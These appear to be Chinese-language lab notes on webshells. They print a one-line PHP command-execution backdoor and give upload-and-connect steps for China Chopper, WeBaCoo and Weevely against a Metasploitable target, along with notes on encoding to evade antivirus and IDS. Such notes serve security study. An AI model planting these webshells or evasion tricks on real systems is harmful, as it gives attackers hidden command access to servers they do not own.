webshell
本质:<?php echo shell_exec($_GET['cmd']);?>
windows平台
中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强 【但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/】
1、利用上传漏洞,先上传一句话木马【支持三种服务器端PHP、ASP、ASP.NET】
使用ssh连接metasploitable
创建包含木马代码的文件
2、连接相应的服务器端
添加服务器端URL 【密码为一句话木马中的参数】
双击进入文件管理界面
也可以进入命令行模式【虚拟终端】 {权限只为web程序的运行权限}
可能被IDS、AV、WAF、扫描器软件发现查杀 【可编码免杀】
kali平台下的webshell,本质与中国菜刀类似,有编码功能,可避免被查杀
WeBaCoo(Web Backdoor Cookie)【只对PHP】
获取的是类终端的shell
编码通信内容通过cookie头传输,隐蔽性较强
参数:
cm:base64编码的命令
cn:服务器用于返回数据的cookie头的名
cp:返回信息定界符
1、生成服务器端
wenacoo -g -o a.php
##利用scp上传到metaspolitable的服务器根目录
移动webacoo.php到web根目录
2、使用客户端进行连接
webacoo -t -u http://1.1.1.1/a.php
##抓包分析如何通过cookie头传指令,手动触发流量 【cm/cn/cp】
其他参数
webacoo -h
Weevely 【使用http头进行指令(经过编码)传输】
隐蔽的类终端PHP Webshell
有30多个管理模块
执行系统命令、浏览文件系统
检查服务器常见配置错误
创建正向、反向TCP Shell连接
通过目标计算机代理HTTP流量
从目标计算机运行端口扫描,渗透内网
支持连接密码
*****************************************************************
##kali中缺少库
https://pypi.python.org/pypi/PySocks/ 【下载库文件压缩包】
./setup.py install
****************************************************************************************
1、生成服务端 【生成经过编码的木马】
weevely generate <password> <path>
##上传木马
2、连接客户端
weevely <URL> <password> [cmd]
3、模块
help